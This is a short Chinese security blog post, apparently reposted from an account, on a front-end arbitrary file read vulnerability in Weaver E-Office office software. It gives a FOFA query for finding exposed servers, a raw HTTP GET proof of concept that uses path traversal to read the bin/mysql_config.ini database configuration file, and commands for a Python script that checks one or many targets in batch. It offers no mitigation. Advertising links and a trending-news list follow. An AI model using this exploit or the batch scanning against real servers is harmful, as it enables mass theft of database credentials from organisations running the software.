泛微E-Office文件读取漏洞
泛微E-Office是一款企业级的全流程办公自动化软件,它包括协同办公、文档管理、知识管理、工作流管理等多个模块,涵盖了企业日常工作中的各个环节。泛微E-Office能够帮助企业实现全流程数字化、自动化,提高工作效率和管理质量,降低管理成本,为企业提供全面、高效、便捷的办公服务。
泛微E-Office前台文件读取漏洞。
二、网络空间搜索引擎查询
fofa查询
app=“泛微-EOffice”
三、漏洞复现
poc
GET /iweboffice/officeserver2.php?OPTION=LOADTEMPLATE&COMMAND=INSERTFILE&TEMPLATE=../../bin/mysql_config.ini HTTP/1.1Host: ip:portUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36Content-Length: 0
浏览器直接访问返回如下
四、批量检测与利用
单个检测与利用
python .\E-OfficeReadfile.py -u http://ip:port
批量检测
python .\E-OfficeReadfile.py -f filename
关注公众号:拾黑(shiheibook)了解更多
[广告]赞助链接:
四季很好,只要有你,文娱排行榜:https://www.yaopaiming.com/
让资讯触达的更精准有趣:https://www.0xu.cn/

随时掌握互联网精彩
- 1 习近平给田华等8位电影艺术家回信 7904711
- 2 房价倒数第一城都要建机场了 7809093
- 3 国产高铁CR450“过于先进不便展示” 7713311
- 4 外国游客扎堆扫货“中国造” 7619170
- 5 《哪吒2》卖了154亿 影院片方还哭穷 7521933
- 6 杨少华去世原因是肺衰竭 7427346
- 7 123456当密码 麦当劳6400万信息泄露 7333125
- 8 李连杰自曝患甲亢 7239149
- 9 一斤知了价格涨到300元 7137855
- 10 怎么学完胖东来亏得更多了 7041436